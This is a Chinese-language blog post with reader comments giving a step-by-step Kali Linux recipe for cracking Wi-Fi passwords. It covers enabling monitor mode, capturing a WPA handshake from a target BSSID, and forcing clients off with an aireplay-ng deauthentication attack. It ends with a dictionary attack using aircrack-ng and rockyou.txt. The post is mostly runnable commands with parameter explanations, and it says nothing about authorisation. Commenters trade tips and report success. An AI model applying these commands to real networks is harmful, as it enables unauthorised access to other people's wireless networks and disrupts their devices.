Kali破解wifi密码命令笔记

OnionT@KillBoy
OnionT@KillBoy
作者
47
文章
0
粉丝
渗透测试278,8392字数 325阅读1分5秒阅读模式
AI智能摘要
你是否好奇Wi-Fi密码背后的安全防线究竟有多脆弱?本文揭秘kali linux下一套完整的Wi-Fi密码破解流程,从网卡监控模式开启到捕获握手包,再到字典攻击全程实操解析。适合网络安全爱好者学习渗透测试技术,掌握无线防护原理。每一步命令均附详细参数说明,零基础也能看懂。安全研究还是技术挑战?关键在于你如何使用这份“数字钥匙”。
— AI 生成的文章内容摘要

1、查看网卡是否支持
# airmon-ng
上面命令列出了支持监控模式的无线网卡。如果没有任何输出,表示无线网卡不支持监控模式。你可以看到我的wlan0支持监控模式。

2、开启无线网卡的监控模式
# airmon-ng start wlan0
执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看。

3、查看wifi网络
# airodump-ng wlan0mon
列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。要记住要破解wifi的频道号和BSSID。

4、抓取握手包
# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon
参数解释:
-c指定频道号
–bssid指定路由器bssid
-w指定抓取的数据包保存位置

5、强制连接到wifi的设备重新连接路由器
# aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon
参数解释:
-0表示发起deauthentication攻击
-a指定无线路由器BSSID
-c指定强制断开的设备

6、结束监听模式
# airmon-ng stop wlan0mon

7、破解密码
# aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap
参数解释:
-a2代表WPA的握手包
-b指定要破解的wifi BSSID。
-w指定字典文件
最后是抓取的包

http://www.oniont.cn/index.php/archives/134.html

 
OnionT@KillBoy
评论  27  访客  27
    • 会跳舞的土豆
      会跳舞的土豆 1

      网卡不支持的话是不是就没戏了?

      • 苍山远
        苍山远 0

        我之前折腾这个搞了半天,最后发现网卡驱动有问题😂

        • 冰封剑士
          冰封剑士 1

          命令写得挺清楚的,收藏起来试试看

          • 幽灵遐想
            幽灵遐想 0

            airmon-ng那步经常卡住,有啥窍门吗

            • 神秘变色龙
              神秘变色龙 0

              握手包抓不到很烦人,有时候得等好久

                • 烟火日常
                  烟火日常 0

                  @ 神秘变色龙 网卡不支持基本就凉了,得换硬件才行。

                • 打工人の逆袭
                  打工人の逆袭 0

                  这种教程现在还能用吗,路由器都升级了

                  • 小鸟羽毛糖
                    小鸟羽毛糖 0

                    直接用虚拟机跑kali会不会更方便点

                    • Onyx Starlight
                      Onyx Starlight 1

                      字典太弱的话基本破不开,得自己生成组合

                      • 甜甜圈妹妹
                        甜甜圈妹妹 1

                        看完感觉步骤好多啊,有没有更简单的工具推荐

                        • 会打呼噜的枕头
                          会打呼噜的枕头 0

                          实测有效,但成功率得看信号强度和字典

                            • 冷静的思考者
                              冷静的思考者 0

                              @ 会打呼噜的枕头 -a2参数确实要注意,有些旧版本可能不支持。

                            • 呆萌星
                              呆萌星 0

                              这步骤真的管用。

                              • Etherealwisp
                                Etherealwisp 1

                                看完教程后,我成功抓到握手包,真的挺开心的,值得一试。

                                • 阳光小松鼠
                                  阳光小松鼠 0

                                  记得先把airmon-ng的kill进程关掉。

                                  • 鼓声回响
                                    鼓声回响 1

                                    BSSID和频道号怎么一起复制?

                                    • 暗鸦先知
                                      暗鸦先知 0

                                      我之前也卡在airmon-ng,换了软驱后才行。

                                      • 光之预言者
                                        光之预言者 0

                                        这命令敲起来有点儿累,手酸 🤦

                                        • Pixel小魔
                                          Pixel小魔 0

                                          有人说新版路由器不怕,结果还是被抓住了,安全性真的不如想象。

                                          • 九幽魂影
                                            九幽魂影 0

                                            deauth攻击次数可以多点吗,效果会更好吗?

                                            • 小幸运星
                                              小幸运星 0

                                              其实字典不一定要rockyou,自己组合更有效。

                                              • 轻纱如梦
                                                轻纱如梦 1

                                                整体流程挺完整,但要注意aircrack-ng的版本兼容性,旧版可能不支持‑a2参数,建议先`aircrack-ng -h`确认,另外实战中最好准备多个字典,防止单一字典被复杂密码卡住。

                                                • 亡者之握
                                                  亡者之握 1

                                                  感觉不太稳,路由器升个级就白忙活。

                                                  • 蘑菇君
                                                    蘑菇君 0

                                                    之前用虚拟机试过,兼容性还行但性能差点。

                                                    • 奶罐小精灵
                                                      奶罐小精灵 0

                                                      命令写得挺详细,照着弄应该能跑起来。

                                                      • 雾中仙踪
                                                        雾中仙踪 1

                                                        这种教程现在还有用吗?感觉路由器都升级好几代了。

                                                        • 青蛾幻影
                                                          青蛾幻影 1

                                                          抓包就得看运气,有时候等半天都没设备连。

                                                        匿名

                                                        发表评论

                                                        匿名网友

                                                        拖动滑块以完成验证